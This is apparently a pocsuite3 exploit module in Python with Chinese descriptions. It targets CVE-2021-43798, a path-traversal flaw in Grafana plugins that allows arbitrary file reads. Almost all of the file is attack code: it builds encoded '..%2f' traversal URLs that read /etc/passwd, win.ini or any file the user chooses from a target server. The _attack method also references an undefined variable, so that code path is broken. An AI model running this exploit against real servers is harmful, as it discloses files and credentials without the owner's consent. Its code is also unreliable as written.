Grafana plugins 任意文件读取漏洞 CVE-2021-43798.py

from pocsuite3.lib.core.data import logger
from collections import OrderedDict
from urllib.parse import urljoin
from requests.exceptions import ReadTimeout
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, REVERSE_PAYLOAD, OptString, OptItems, OptDict, VUL_TYPE
from pocsuite3.lib.utils import get_middle_text

class DemoPOC(POCBase):
    vulID = '6'  
    name = 'Grafana plugins 任意文件读取漏洞 CVE-2021-43798'
    desc = '''Grafana存在任意文件读取漏洞，通过默认存在的插件，可构造特殊的请求包读取服务器任意文件'''
    appName = 'Grafana'
    appVersion = '<= 8.x'
    samples = []
    install_requires = ['']
    vulType = VUL_TYPE.PATH_DISCLOSURE
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _options(self):
        o = OrderedDict()
        system = {
            "Windows": "c:/windows/win.ini",
            "Linux": "/etc/passwd",
        }
        o["system"] = OptDict(default=system, selected="Linux")
        o["plugin"] = OptString("welcome", description='插件名')
        o["filename"] = OptString("/etc/passwd", description='文件读取自定义命令')
        return o

    def _verify(self):
        result = {}
        target = self.url + "/public/plugins/" + self.get_option("plugin") + "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f.." + self.get_option("system")
        print(target)
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
        }
        try:
            r = requests.get(url=target, headers=headers, timeout=5)
            if r.status_code == 200 and ('root:' in r.text or 'for 16-bit app support' in r.text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['File'] = self.get_option("system")
                result['VerifyInfo']['Response'] = r.text
        except:
            pass

        return self.parse_output(result)

    def _attack(self):
        result = {}
        target = self.url + "/public/plugins/" + self.get_option("plugin") + "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f.." + self.get_option("filename")
        print(url)
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
        }
        try:
            r = requests.get(url, headers=headers, timeout=5)
            if r.status_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['File'] = self.get_option("filename")
                result['VerifyInfo']['Response'] = r.text
        except:
            pass

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)